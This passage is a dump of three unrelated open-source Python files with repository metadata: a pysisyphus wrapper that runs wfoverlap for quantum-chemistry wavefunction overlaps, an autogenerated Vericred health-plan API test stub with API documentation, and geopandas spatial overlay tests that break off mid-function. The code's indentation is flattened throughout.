class WFOWrapper:
logger = logging.getLogger("wfoverlap")
matrix_types = OrderedDict((
("ovlp", "Overlap matrix"),
("renorm", "Renormalized overlap matrix"),
("ortho", "Orthonormalized overlap matrix")
))
def __init__(self, occ_mo_num, virt_mo_num, conf_thresh=1e-3,
calc_number=0, out_dir="./", wfow_mem=8000,
ncore=0, debug=False):
try:
self.base_cmd = Config["wfoverlap"]["cmd"]
except KeyError:
self.log("WFOverlap cmd not found in ~/.pysisyphusrc!")
# Should correspond to the attribute of the parent calculator
self.calc_number = calc_number
self.name = f"WFOWrapper_{self.calc_number}"
self.conf_thresh = conf_thresh
self.out_dir = Path(out_dir).resolve()
self.wfow_mem = int(wfow_mem)
self.ncore = int(ncore)
self.debug = debug
self.log(f"Using -m {self.wfow_mem} for wfoverlap.")
self.mo_inds_list = list()
self.from_set_list = list()
self.to_set_list = list()
self.turbo_mos_list = list()
self.occ_mo_num = int(occ_mo_num)
self.virt_mo_num = int(virt_mo_num)
self.mo_num = self.occ_mo_num + self.virt_mo_num
self.base_det_str = "d"*self.occ_mo_num + "e"*self.virt_mo_num
self.fmt = "{: .10f}"
self.iter_counter = 0
@property
def conf_thresh(self):
return self._conf_thresh
@conf_thresh.setter
def conf_thresh(self, conf_thresh):
self._conf_thresh = conf_thresh
self.log(f"Set CI-coeff threshold to {self.conf_thresh:.4e}")
def log(self, message):
self.logger.debug(f"{self.name}, " + message)
def fake_turbo_mos(self, mo_coeffs):
"""Create a mos file suitable for TURBOMOLE input. All MO eigenvalues
are set to 0.0. There is also a little deviation in the formatting
(see turbo_fmt()) but it works ..."""
def turbo_fmt(num):
"""Not quite the real TURBOMOLE format, but it works ...
In TURBOMOLE the first character is always 0 for positive doubles
and - for negative doubles."""
return f"{num:+20.13E}".replace("E", "D")
base = "$scfmo scfconv=7 format(4d20.14)\n# from pysisyphus\n" \
"{mo_strings}\n$end"
# WFOverlap expects the string eigenvalue starting at 16, so we have
mo_str = "{mo_index:>6d} a eigenvalue=-.00000000000000D+00 " \
"nsaos={nsaos}\n{joined}"
nsaos = mo_coeffs.shape[0]
mo_strings = list()
for mo_index, mo in enumerate(mo_coeffs, 1):
in_turbo_fmt = [turbo_fmt(c) for c in mo]
# Combine into chunks of four
lines = ["".join(chnk) for chnk in chunks(in_turbo_fmt, 4)]
# Join the lines
joined = "\n".join(lines)
mo_strings.append(mo_str.format(mo_index=mo_index, nsaos=nsaos,
joined=joined))
return base.format(mo_strings="\n".join(mo_strings))
def ci_coeffs_above_thresh(self, ci_coeffs, thresh=None):
# Drop unimportant configurations, that are configurations
# having low weights in all states under consideration.
if thresh is None:
thresh = self.conf_thresh
mo_inds = np.where(np.abs(ci_coeffs) >= thresh)
return mo_inds
def make_det_string(self, inds):
"""Return spin adapted strings."""
from_mo, to_mo = inds
# Until now the first virtual MO (to_mo) has index 0. To subsitute
# the base_str at the correct index we have to increase all to_mo
# indices by the number off occupied MO.
to_mo += self.occ_mo_num
# Make string for excitation of an alpha electron
ab = list(self.base_det_str)
ab[from_mo] = "b"
ab[to_mo] = "a"
ab_str = "".join(ab)
# Make string for excitation of an beta electron
ba = list(self.base_det_str)
ba[from_mo] = "a"
ba[to_mo] = "b"
ba_str = "".join(ba)
return ab_str, ba_str
def generate_all_dets(self, occ_set1, virt_set1, occ_set2, virt_set2):
"""Generate all possible single excitation determinant strings
from union(occ_mos) to union(virt_mos)."""
# Unite the respective sets of both calculations
occ_set = occ_set1 | occ_set2
virt_set = virt_set1 | virt_set2
# Genrate all possible excitations (combinations) from the occupied
# MO set to (and) the virtual MO set.
all_inds = [(om, vm) for om, vm
in itertools.product(occ_set, virt_set)]
det_strings = [self.make_det_string(inds) for inds in all_inds]
return all_inds, det_strings
def make_full_dets_list(self, all_inds, det_strings, ci_coeffs):
dets_list = list()
for inds, det_string in zip(all_inds, det_strings):
ab, ba = det_string
from_mo, to_mo = inds
per_state = ci_coeffs[:,from_mo,to_mo]
if (np.abs(per_state) < self.conf_thresh).all():
continue
# A singlet determinant can be formed in two ways:
# (up down) (up down) (up down) ...
# or
# (down up) (down up) (down up) ...
# We take this into account by expanding the singlet determinants
# and using a proper normalization constant.
# See 10.1063/1.3000012 Eq. (5) and 10.1021/acs.jpclett.7b01479 SI
# and "Principles of Molecular Photochemistry: An Introduction",
# Section 2.27 Vector model of Two Coupled Electron Spins, p. 91-92
per_state *= 1/(2**0.5)
as_str = lambda arr: " ".join([self.fmt.format(cic)
for cic in arr])
ps_str = as_str(per_state)
mps_str = as_str(-per_state)
dets_list.append(f"{ab}\t{ps_str}")
dets_list.append(f"{ba}\t{mps_str}")
return dets_list
def set_from_nested_list(self, nested):
return set([i for i in itertools.chain(*nested)])
def make_dets_header(self, cic, dets_list):
return f"{len(cic)} {self.mo_num} {len(dets_list)}"
def parse_wfoverlap_out(self, text, type_="ortho"):
"""Returns overlap matrix."""
header_str = self.matrix_types[type_] + " <PsiA_i|PsiB_j>"
header = pp.Literal(header_str)
float_ = pp.Word(pp.nums+"-.")
psi_bra = pp.Literal("<Psi") + pp.Word(pp.alphas) \
+ pp.Word(pp.nums) + pp.Literal("|")
psi_ket = pp.Literal("|Psi") + pp.Word(pp.alphas) \
+ pp.Word(pp.nums) + pp.Literal(">")
matrix_line = pp.Suppress(psi_bra) + pp.OneOrMore(float_)
# I really don't know why this is needed but otherwise I can't parse
# overlap calculations with the true AO overlap matrix, even though
# the files appear completely similar regarding printing of the matrices.
# WTF. WTF!
text = text.replace("\n", " ")
parser = pp.SkipTo(header, include=True) \
+ pp.OneOrMore(psi_ket) \
+ pp.OneOrMore(matrix_line).setResultsName("overlap")
result = parser.parseString(text)
return np.array(list(result["overlap"]), dtype=np.float)
def get_from_to_sets(self, ci_coeffs):
all_mo_inds = [self.ci_coeffs_above_thresh(per_state)
for per_state in ci_coeffs]
from_mos, to_mos = zip(*all_mo_inds)
from_set = self.set_from_nested_list(from_mos)
to_set = self.set_from_nested_list(to_mos)
return from_set, to_set
def get_gs_line(self, ci_coeffs_with_gs):
gs_coeffs = np.zeros(len(ci_coeffs_with_gs))
# Ground state is 100% HF configuration
gs_coeffs[0] = 1
gs_coeffs_str = " ".join([self.fmt.format(c)
for c in gs_coeffs])
gs_line = f"{self.base_det_str}\t{gs_coeffs_str}"
return gs_line
def wf_overlap(self, cycle1, cycle2, ao_ovlp=None):
mos1, cic1 = cycle1
mos2, cic2 = cycle2
fs1, ts1 = self.get_from_to_sets(cic1)
fs2, ts2 = self.get_from_to_sets(cic2)
# Create a fake array for the ground state where all CI coefficients
# are zero and add it.
gs_cic = np.zeros_like(cic1[0])
cic1_with_gs = np.concatenate((gs_cic[None,:,:], cic1))
cic2_with_gs = np.concatenate((gs_cic[None,:,:], cic2))
all_inds, det_strings = self.generate_all_dets(fs1, ts1, fs2, ts2)
# Prepare lines for ground state
gs_line1 = self.get_gs_line(cic1_with_gs)
gs_line2 = self.get_gs_line(cic2_with_gs)
dets1 = [gs_line1] + self.make_full_dets_list(all_inds,
det_strings,
cic1_with_gs)
dets2 = [gs_line2] + self.make_full_dets_list(all_inds,
det_strings,
cic2_with_gs)
header1 = self.make_dets_header(cic1_with_gs, dets1)
header2 = self.make_dets_header(cic2_with_gs, dets2)
backup_path = self.out_dir / f"wfo_{self.calc_number}.{self.iter_counter:03d}"
with tempfile.TemporaryDirectory() as tmp_dir:
tmp_path = Path(tmp_dir)
self.log(f"Calculation in {tmp_dir}")
# Write fake TURBOMOLE mo files
for i, mos in enumerate((mos1, mos2), 1):
turbo_mos = self.fake_turbo_mos(mos)
with open(tmp_path / f"mos.{i}", "w") as handle:
handle.write(turbo_mos)
dets1_path = tmp_path / "dets.1"
with open(dets1_path, "w") as handle:
handle.write(header1+"\n"+"\n".join(dets1))
dets2_path = tmp_path / "dets.2"
with open(dets2_path, "w") as handle:
handle.write(header2+"\n"+"\n".join(dets2))
# Decide wether to use a double molecule overlap matrix or
# (approximately) reconstruct the ao_ovlp matrix from the MO
# coefficients.
if ao_ovlp is None:
ciovl_in = CIOVL_NO_SAO
self.log("Got no ao_ovl-matrix. Using ao_read=-1 and "
"same_aos=.true. to reconstruct the AO-overlap matrix!")
else:
ciovl_in = CIOVL
ao_header = "{} {}".format(*ao_ovlp.shape)
ao_ovl_path = tmp_path / "ao_ovl"
np.savetxt(ao_ovl_path, ao_ovlp, fmt="%22.15E", header=ao_header,
comments="")
ciovl_in_rendered = ciovl_in.format(ncore=self.ncore)
ciovl_fn = "ciovl.in"
with open(tmp_path / ciovl_fn, "w") as handle:
handle.write(ciovl_in_rendered)
# Create a backup of the whole temporary directory
try:
shutil.rmtree(backup_path)
except FileNotFoundError:
pass
shutil.copytree(tmp_dir, backup_path)
# Currently, debug==True crashes the subsequent parsing
debug_str = "--debug" if self.debug else ""
cmd = f"{self.base_cmd} -m {self.wfow_mem} -f {ciovl_fn} {debug_str}".split()
result = subprocess.Popen(cmd, cwd=tmp_path,
stdout=subprocess.PIPE)
result.wait()
stdout = result.stdout.read().decode("utf-8")
self.iter_counter += 1
if "differs significantly" in stdout:
self.log("WARNING: Orthogonalized matrix differs significantly "
"from original matrix! There is probably mixing with "
"external states.")
wfo_log_fn = self.out_dir / f"wfo_{self.calc_number}.{self.iter_counter:03d}.out"
with open(wfo_log_fn, "w") as handle:
handle.write(stdout)
# Also copy the WFO-output to the input backup
shutil.copy(wfo_log_fn, backup_path)
matrices = [self.parse_wfoverlap_out(stdout, type_=key)
for key in self.matrix_types.keys()]
reshaped_mats = [mat.reshape(-1, len(cic2_with_gs))
for mat in matrices]
for key, mat in zip(self.matrix_types.keys(), reshaped_mats):
mat_fn = backup_path / f"{key}_mat.dat"
np.savetxt(mat_fn, mat)
return reshaped_mats
def __str__(self):
return self.name
|
eljost/pysisyphus
|
pysisyphus/calculators/WFOWrapper.py
|
Python
|
gpl-3.0
| 13,194
|
[
"TURBOMOLE"
] |
0976d422dbdb4a310542a90cda7ccac17cefc03154e3ec2a0ae16bbd7a275fdb
|
# coding: utf-8
"""
Vericred API
Vericred's API allows you to search for Health Plans that a specific doctor
accepts.
## Getting Started
Visit our [Developer Portal](https://developers.vericred.com) to
create an account.
Once you have created an account, you can create one Application for
Production and another for our Sandbox (select the appropriate Plan when
you create the Application).
## SDKs
Our API follows standard REST conventions, so you can use any HTTP client
to integrate with us. You will likely find it easier to use one of our
[autogenerated SDKs](https://github.com/vericred/?query=vericred-),
which we make available for several common programming languages.
## Authentication
To authenticate, pass the API Key you created in the Developer Portal as
a `Vericred-Api-Key` header.
`curl -H 'Vericred-Api-Key: YOUR_KEY' "https://api.vericred.com/providers?search_term=Foo&zip_code=11215"`
## Versioning
Vericred's API default to the latest version. However, if you need a specific
version, you can request it with an `Accept-Version` header.
The current version is `v3`. Previous versions are `v1` and `v2`.
`curl -H 'Vericred-Api-Key: YOUR_KEY' -H 'Accept-Version: v2' "https://api.vericred.com/providers?search_term=Foo&zip_code=11215"`
## Pagination
Endpoints that accept `page` and `per_page` parameters are paginated. They expose
four additional fields that contain data about your position in the response,
namely `Total`, `Per-Page`, `Link`, and `Page` as described in [RFC-5988](https://tools.ietf.org/html/rfc5988).
For example, to display 5 results per page and view the second page of a
`GET` to `/networks`, your final request would be `GET /networks?....page=2&per_page=5`.
## Sideloading
When we return multiple levels of an object graph (e.g. `Provider`s and their `State`s
we sideload the associated data. In this example, we would provide an Array of
`State`s and a `state_id` for each provider. This is done primarily to reduce the
payload size since many of the `Provider`s will share a `State`
```
{
providers: [{ id: 1, state_id: 1}, { id: 2, state_id: 1 }],
states: [{ id: 1, code: 'NY' }]
}
```
If you need the second level of the object graph, you can just match the
corresponding id.
## Selecting specific data
All endpoints allow you to specify which fields you would like to return.
This allows you to limit the response to contain only the data you need.
For example, let's take a request that returns the following JSON by default
```
{
provider: {
id: 1,
name: 'John',
phone: '1234567890',
field_we_dont_care_about: 'value_we_dont_care_about'
},
states: [{
id: 1,
name: 'New York',
code: 'NY',
field_we_dont_care_about: 'value_we_dont_care_about'
}]
}
```
To limit our results to only return the fields we care about, we specify the
`select` query string parameter for the corresponding fields in the JSON
document.
In this case, we want to select `name` and `phone` from the `provider` key,
so we would add the parameters `select=provider.name,provider.phone`.
We also want the `name` and `code` from the `states` key, so we would
add the parameters `select=states.name,states.code`. The id field of
each document is always returned whether or not it is requested.
Our final request would be `GET /providers/12345?select=provider.name,provider.phone,states.name,states.code`
The response would be
```
{
provider: {
id: 1,
name: 'John',
phone: '1234567890'
},
states: [{
id: 1,
name: 'New York',
code: 'NY'
}]
}
```
## Benefits summary format
Benefit cost-share strings are formatted to capture:
* Network tiers
* Compound or conditional cost-share
* Limits on the cost-share
* Benefit-specific maximum out-of-pocket costs
**Example #1**
As an example, we would represent [this Summary of Benefits & Coverage](https://s3.amazonaws.com/vericred-data/SBC/2017/33602TX0780032.pdf) as:
* **Hospital stay facility fees**:
- Network Provider: `$400 copay/admit plus 20% coinsurance`
- Out-of-Network Provider: `$1,500 copay/admit plus 50% coinsurance`
- Vericred's format for this benefit: `In-Network: $400 before deductible then 20% after deductible / Out-of-Network: $1,500 before deductible then 50% after deductible`
* **Rehabilitation services:**
- Network Provider: `20% coinsurance`
- Out-of-Network Provider: `50% coinsurance`
- Limitations & Exceptions: `35 visit maximum per benefit period combined with Chiropractic care.`
- Vericred's format for this benefit: `In-Network: 20% after deductible / Out-of-Network: 50% after deductible | limit: 35 visit(s) per Benefit Period`
**Example #2**
In [this other Summary of Benefits & Coverage](https://s3.amazonaws.com/vericred-data/SBC/2017/40733CA0110568.pdf), the **specialty_drugs** cost-share has a maximum out-of-pocket for in-network pharmacies.
* **Specialty drugs:**
- Network Provider: `40% coinsurance up to a $500 maximum for up to a 30 day supply`
- Out-of-Network Provider `Not covered`
- Vericred's format for this benefit: `In-Network: 40% after deductible, up to $500 per script / Out-of-Network: 100%`
**BNF**
Here's a description of the benefits summary string, represented as a context-free grammar:
```
root ::= coverage
coverage ::= (simple_coverage | tiered_coverage) (space pipe space coverage_modifier)?
tiered_coverage ::= tier (space slash space tier)*
tier ::= tier_name colon space (tier_coverage | not_applicable)
tier_coverage ::= simple_coverage (space (then | or | and) space simple_coverage)* tier_limitation?
simple_coverage ::= (pre_coverage_limitation space)? coverage_amount (space post_coverage_limitation)? (comma? space coverage_condition)?
coverage_modifier ::= limit_condition colon space (((simple_coverage | simple_limitation) (semicolon space see_carrier_documentation)?) | see_carrier_documentation | waived_if_admitted | shared_across_tiers)
waived_if_admitted ::= ("copay" space)? "waived if admitted"
simple_limitation ::= pre_coverage_limitation space "copay applies"
tier_name ::= "In-Network-Tier-2" | "Out-of-Network" | "In-Network"
limit_condition ::= "limit" | "condition"
tier_limitation ::= comma space "up to" space (currency | (integer space time_unit plural?)) (space post_coverage_limitation)?
coverage_amount ::= currency | unlimited | included | unknown | percentage | (digits space (treatment_unit | time_unit) plural?)
pre_coverage_limitation ::= first space digits space time_unit plural?
post_coverage_limitation ::= (((then space currency) | "per condition") space)? "per" space (treatment_unit | (integer space time_unit) | time_unit) plural?
coverage_condition ::= ("before deductible" | "after deductible" | "penalty" | allowance | "in-state" | "out-of-state") (space allowance)?
allowance ::= upto_allowance | after_allowance
upto_allowance ::= "up to" space (currency space)? "allowance"
after_allowance ::= "after" space (currency space)? "allowance"
see_carrier_documentation ::= "see carrier documentation for more information"
shared_across_tiers ::= "shared across all tiers"
unknown ::= "unknown"
unlimited ::= /[uU]nlimited/
included ::= /[iI]ncluded in [mM]edical/
time_unit ::= /[hH]our/ | (((/[cC]alendar/ | /[cC]ontract/) space)? /[yY]ear/) | /[mM]onth/ | /[dD]ay/ | /[wW]eek/ | /[vV]isit/ | /[lL]ifetime/ | ((((/[bB]enefit/ plural?) | /[eE]ligibility/) space)? /[pP]eriod/)
treatment_unit ::= /[pP]erson/ | /[gG]roup/ | /[cC]ondition/ | /[sS]cript/ | /[vV]isit/ | /[eE]xam/ | /[iI]tem/ | /[sS]tay/ | /[tT]reatment/ | /[aA]dmission/ | /[eE]pisode/
comma ::= ","
colon ::= ":"
semicolon ::= ";"
pipe ::= "|"
slash ::= "/"
plural ::= "(s)" | "s"
then ::= "then" | ("," space) | space
or ::= "or"
and ::= "and"
not_applicable ::= "Not Applicable" | "N/A" | "NA"
first ::= "first"
currency ::= "$" number
percentage ::= number "%"
number ::= float | integer
float ::= digits "." digits
integer ::= /[0-9]/+ (comma_int | under_int)*
comma_int ::= ("," /[0-9]/*3) !"_"
under_int ::= ("_" /[0-9]/*3) !","
digits ::= /[0-9]/+ ("_" /[0-9]/+)*
space ::= /[ \t]/+
```
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import os
import sys
import unittest
import vericred_client
from vericred_client.rest import ApiException
from vericred_client.apis.plans_api import PlansApi
class TestPlansApi(unittest.TestCase):
""" PlansApi unit test stubs """
def setUp(self):
self.api = vericred_client.apis.plans_api.PlansApi()
def tearDown(self):
pass
def test_find_plans(self):
"""
Test case for find_plans
Find Plans
"""
pass
def test_show_plan(self):
"""
Test case for show_plan
Show Plan
"""
pass
if __name__ == '__main__':
unittest.main()
|
vericred/vericred-python
|
test/test_plans_api.py
|
Python
|
apache-2.0
| 10,125
|
[
"VisIt"
] |
67ec9fe59b61f9b8ae9ae551afbfdc97fc4348f7bfb54632eedbe4513867d66f
|
import os
from distutils.version import LooseVersion
import numpy as np
import pandas as pd
from shapely.geometry import Point, Polygon, LineString, GeometryCollection, box
from fiona.errors import DriverError
import geopandas
from geopandas import GeoDataFrame, GeoSeries, overlay, read_file
from geopandas import _compat
from geopandas.testing import assert_geodataframe_equal, assert_geoseries_equal
import pytest
DATA = os.path.join(os.path.abspath(os.path.dirname(__file__)), "data", "overlay")
pytestmark = pytest.mark.skip_no_sindex
pandas_133 = pd.__version__ == LooseVersion("1.3.3")
@pytest.fixture
def dfs(request):
s1 = GeoSeries(
[
Polygon([(0, 0), (2, 0), (2, 2), (0, 2)]),
Polygon([(2, 2), (4, 2), (4, 4), (2, 4)]),
]
)
s2 = GeoSeries(
[
Polygon([(1, 1), (3, 1), (3, 3), (1, 3)]),
Polygon([(3, 3), (5, 3), (5, 5), (3, 5)]),
]
)
df1 = GeoDataFrame({"col1": [1, 2], "geometry": s1})
df2 = GeoDataFrame({"col2": [1, 2], "geometry": s2})
return df1, df2
@pytest.fixture(params=["default-index", "int-index", "string-index"])
def dfs_index(request, dfs):
df1, df2 = dfs
if request.param == "int-index":
df1.index = [1, 2]
df2.index = [0, 2]
if request.param == "string-index":
df1.index = ["row1", "row2"]
return df1, df2
@pytest.fixture(
params=["union", "intersection", "difference", "symmetric_difference", "identity"]
)
def how(request):
if pandas_133 and request.param in ["symmetric_difference", "identity", "union"]:
pytest.xfail("Regression in pandas 1.3.3 (GH #2101)")
return request.param
@pytest.fixture(params=[True, False])
def keep_geom_type(request):
return request.param
def test_overlay(dfs_index, how):
"""
Basic overlay test with small dummy example dataframes (from docs).
Results obtained using QGIS 2.16 (Vector -> Geoprocessing Tools ->
Intersection / Union / ...), saved to GeoJSON
"""
df1, df2 = dfs_index
result = overlay(df1, df2, how=how)
# construction of result
def _read(name):
expected = read_file(
os.path.join(DATA, "polys", "df1_df2-{0}.geojson".format(name))
)
expected.crs = None
return expected
if how == "identity":
expected_intersection = _read("intersection")
expected_difference = _read("difference")
expected = pd.concat(
[expected_intersection, expected_difference], ignore_index=True, sort=False
)
expected["col1"] = expected["col1"].astype(float)
else:
expected = _read(how)
# TODO needed adaptations to result
if how == "union":
result = result.sort_values(["col1", "col2"]).reset_index(drop=True)
elif how == "difference":
result = result.reset_index(drop=True)
assert_geodataframe_equal(result, expected, check_column_type=False)
# for difference also reversed
if how == "difference":
result = overlay(df2, df1, how=how)
result = result.reset_index(drop=True)
expected = _read("difference-inverse")
assert_geodataframe_equal(result, expected, check_column_type=False)
@pytest.mark.filterwarnings("ignore:GeoSeries crs mismatch:UserWarning")
def test_overlay_nybb(how):
polydf = read_file(geopandas.datasets.get_path("nybb"))
# The circles have been constructed and saved at the time the expected
# results were created (exact output of buffer algorithm can slightly
# change over time -> use saved ones)
# # construct circles dataframe
# N = 10
# b = [int(x) for x in polydf.total_bounds]
# polydf2 = GeoDataFrame(
# [
# {"geometry": Point(x, y).buffer(10000), "value1": x + y, "value2": x - y}
# for x, y in zip(
# range(b[0], b[2], int((b[2] - b[0]) / N)),
# range(b[1], b[3], int((b[3] - b[1]) / N)),
# )
# ],
# crs=polydf.crs,
# )
polydf2 = read_file(os.path.join(DATA, "nybb_qgis", "polydf2.shp"))
result = overlay(polydf, polydf2, how=how)
cols = ["BoroCode", "BoroName", "Shape_Leng", "Shape_Area", "value1", "value2"]
if how == "difference":
cols = cols[:-2]
# expected result
if how == "identity":
# read union one, further down below we take the appropriate subset
expected = read_file(os.path.join(DATA, "nybb_qgis", "qgis-union.shp"))
else:
expected = read_file(
os.path.join(DATA, "nybb_qgis", "qgis-{0}.shp".format(how))
)
# The result of QGIS for 'union' contains incorrect geometries:
# 24 is a full original circle overlapping with unioned geometries, and
# 27 is a completely duplicated row)
if how == "union":
expected = expected.drop([24, 27])
expected.reset_index(inplace=True, drop=True)
# Eliminate observations without geometries (issue from QGIS)
expected = expected[expected.is_valid]
expected.reset_index(inplace=True, drop=True)
if how == "identity":
expected = expected[expected.BoroCode.notnull()].copy()
# Order GeoDataFrames
expected = expected.sort_values(cols).reset_index(drop=True)
# TODO needed adaptations to result
result = result.sort_values(cols).reset_index(drop=True)
if how in ("union", "identity"):
# concat < 0.23 sorts, so changes the order of the columns
# but at least we ensure 'geometry' is the last column
assert result.columns[-1] == "geometry"
assert len(result.columns) == len(expected.columns)
result = result.reindex(columns=expected.columns)
# the ordering of the spatial index results causes slight deviations
# in the resultant geometries for multipolygons
# for more details on the discussion, see:
# https://github.com/geopandas/geopandas/pull/1338
# https://github.com/geopandas/geopandas/issues/1337
# Temporary workaround below:
# simplify multipolygon geometry comparison
# since the order of the constituent polygons depends on
# the ordering of spatial indexing results, we cannot
# compare symmetric_difference results directly when the
# resultant geometry is a multipolygon
# first, check that all bounds and areas are approx equal
# this is a very rough check for multipolygon equality
if not _compat.PANDAS_GE_11:
kwargs = dict(check_less_precise=True)
else:
kwargs = {}
pd.testing.assert_series_equal(
result.geometry.area, expected.geometry.area, **kwargs
)
pd.testing.assert_frame_equal(
result.geometry.bounds, expected.geometry.bounds, **kwargs
)
# There are two cases where the multipolygon have a different number
# of sub-geometries -> not solved by normalize (and thus drop for now)
if how == "symmetric_difference":
expected.loc[9, "geometry"] = None
result.loc[9, "geometry"] = None
if how == "union":
expected.loc[24, "geometry"] = None
result.loc[24, "geometry"] = None
assert_geodataframe_equal(
result,
expected,
normalize=True,
check_crs=False,
check_column_type=False,
check_less_precise=True,
)
def test_overlay_overlap(how):
"""
Overlay test with overlapping geometries in both dataframes.
Test files are created with::
import geopandas
from geopandas import GeoSeries, GeoDataFrame
from shapely.geometry import Point, Polygon, LineString
s1 = GeoSeries([Point(0, 0), Point(1.5, 0)]).buffer(1, resolution=2)
s2 = GeoSeries([Point(1, 1), Point(2, 2)]).buffer(1, resolution=2)
df1 = GeoDataFrame({'geometry': s1, 'col1':[1,2]})
df2 = GeoDataFrame({'geometry': s2, 'col2':[1, 2]})
ax = df1.plot(alpha=0.5)
df2.plot(alpha=0.5, ax=ax, color='C1')
df1.to_file('geopandas/geopandas/tests/data/df1_overlap.geojson',
driver='GeoJSON')
df2.to_file('geopandas/geopandas/tests/data/df2_overlap.geojson',
driver='GeoJSON')
and then overlay results are obtained from using QGIS 2.16
(Vector -> Geoprocessing Tools -> Intersection / Union / ...),
saved to GeoJSON.
"""
df1 = read_file(os.path.join(DATA, "overlap", "df1_overlap.geojson"))
df2 = read_file(os.path.join(DATA, "overlap", "df2_overlap.geojson"))
result = overlay(df1, df2, how=how)
if how == "identity":
raise pytest.skip()
expected = read_file(
os.path.join(DATA, "overlap", "df1_df2_overlap-{0}.geojson".format(how))
)
if how == "union":
# the QGIS result has the last row duplicated, so removing this
expected = expected.iloc[:-1]
# TODO needed adaptations to result
result = result.reset_index(drop=True)
if how == "union":
result = result.sort_values(["col1", "col2"]).reset_index(drop=True)
assert_geodataframe_equal(
result,
expected,
normalize=True,
check_column_type=False,
check_less_precise=True,
)
@pytest.mark.parametrize("other_geometry", [False, True])
def test_geometry_not_named_geometry(dfs, how, other_geometry):
# Issue #306
# Add points and flip names
df1, df2 = dfs
df3 = df1.copy()
df3 = df3.rename(columns={"geometry": "polygons"})
df3 = df3.set_geometry("polygons")
if other_geometry:
df3["geometry"] = df1.centroid.geometry
assert df3.geometry.name == "polygons"
res1 = overlay(df1, df2, how=how)
res2 = overlay(df3, df2, how=how)
assert df3.geometry.name == "polygons"
if how == "difference":
# in case of 'difference', column names of left frame are preserved
assert res2.geometry.name == "polygons"
if other_geometry:
assert "geometry" in res2.columns
assert_geoseries_equal(
res2["geometry"], df3["geometry"], check_series_type=False
)
res2 = res2.drop(["geometry"], axis=1)
res2 = res2.rename(columns={"polygons": "geometry"})
res2 = res2.set_geometry("geometry")
# TODO if existing column is overwritten -> geometry not last column
if other_geometry and how == "intersection":
res2 = res2.reindex(columns=res1.columns)
assert_geodataframe_equal(res1, res2)
df4 = df2.copy()
df4 = df4.rename(columns={"geometry": "geom"})
df4 = df4.set_geometry("geom")
if other_geometry:
df4["geometry"] = df2.centroid.geometry
assert df4.geometry.name == "geom"
res1 = overlay(df1, df2, how=how)
res2 = overlay(df1, df4, how=how)
assert_geodataframe_equal(res1, res2)
def test_bad_how(dfs):
df1, df2 = dfs
with pytest.raises(ValueError):
overlay(df1, df2, how="spandex")
def test_duplicate_column_name(dfs, how):
if how == "difference":
pytest.skip("Difference uses columns from one df only.")
df1, df2 = dfs
df2r = df2.rename(columns={"col2": "col1"})
res = overlay(df1, df2r, how=how)
assert ("col1_1" in res.columns) and ("col1_2" in res.columns)
def test_geoseries_warning(dfs):
df1, df2 = dfs
# Issue #305
with pytest.raises(NotImplementedError):
overlay(df1, df2.geometry, how="union")
def test_preserve_crs(dfs, how):
df1, df2 = dfs
result = overlay(df1, df2, how=how)
assert result.crs is None
crs = "epsg:4326"
df1.crs = crs
df2.crs = crs
result = overlay(df1, df2, how=how)
assert result.crs == crs
def test_crs_mismatch(dfs, how):
df1, df2 = dfs
df1.crs = 4326
df2.crs = 3857
with pytest.warns(UserWarning, match="CRS mismatch between the CRS"):
overlay(df1, df2, how=how)
def test_empty_intersection(dfs):
df1, df2 = dfs
polys3 = GeoSeries(
[
Polygon([(-1, -1), (-3, -1), (-3, -3), (-1, -3)]),
Polygon([(-3, -3), (-5, -3), (-5, -5), (-3, -5)]),
]
)
df3 = GeoDataFrame({"geometry": polys3, "col3": [1, 2]})
expected = GeoDataFrame([], columns=["col1", "col3", "geometry"])
result = overlay(df1, df3)
assert_geodataframe_equal(result, expected, check_dtype=False)
def test_correct_index(dfs):
# GH883 - case where the index was not properly reset
df1, df2 = dfs
polys3 = GeoSeries(
[
Polygon([(1, 1), (3, 1), (3, 3), (1, 3)]),
Polygon([(-1, 1), (1, 1), (1, 3), (-1, 3)]),
Polygon([(3, 3), (5, 3), (5, 5), (3, 5)]),
]
)
df3 = GeoDataFrame({"geometry": polys3, "col3": [1, 2, 3]})
i1 = Polygon([(1, 1), (1, 3), (3, 3), (3, 1), (1, 1)])
i2 = Polygon([(3, 3), (3, 5), (5, 5), (5, 3), (3, 3)])
expected = GeoDataFrame(
[[1, 1, i1], [3, 2, i2]], columns=["col3", "col2", "geometry"]
)
result = overlay(df3, df2, keep_geom_type=True)
assert_geodataframe_equal(result, expected)
def test_warn_on_keep_geom_type(dfs):
df1, df2 = dfs
polys3 = GeoSeries(
[
Polygon([(1, 1), (3, 1), (3, 3), (1, 3)]),
Polygon([(-1, 1), (1, 1), (1, 3), (-1, 3)]),
Polygon([(3, 3), (5, 3), (5, 5), (3, 5)]),
]
)
df3 = GeoDataFrame({"geometry": polys3})
with pytest.warns(UserWarning, match="`keep_geom_type=True` in overlay"):
overlay(df2, df3, keep_geom_type=None)
@pytest.mark.parametrize(
"geom_types", ["polys", "poly_line", "poly_point", "line_poly", "point_poly"]
)
def test_overlay_strict(how, keep_geom_type, geom_types):
"""
Test of mixed geometry types on input and output. Expected results initially
generated using following snippet.
polys1 = gpd.GeoSeries([Polygon([(1, 1), (3, 1), (3, 3), (1, 3)]),
Polygon([(3, 3), (5, 3), (5, 5), (3, 5)])])
df1 = gpd.GeoDataFrame({'col1': [1, 2], 'geometry': polys1})
polys2 = gpd.GeoSeries([Polygon([(1, 1), (3, 1), (3, 3), (1, 3)]),
Polygon([(-1, 1), (1, 1), (1, 3), (-1, 3)]),
Polygon([(3, 3), (5, 3), (5, 5), (3, 5)])])
df2 = gpd.GeoDataFrame({'geometry': polys2, 'col2': [1, 2, 3]})
lines1 = gpd.GeoSeries([LineString([(2, 0), (2, 4), (6, 4)]),
LineString([(0, 3), (6, 3)])])
df3 = gpd.GeoDataFrame({'col3': [1, 2], 'geometry': lines1})
points1 = gpd.GeoSeries([Point((2, 2)),
Point((3, 3))])
df4 = gpd.GeoDataFrame({'col4': [1, 2], 'geometry': points1})
params=["union", "intersection", "difference", "symmetric_difference",
"identity"]
stricts = [True, False]
for p in params:
for s in stricts:
exp = gpd.overlay(df1, df2, how=p, keep_geom_type=s)
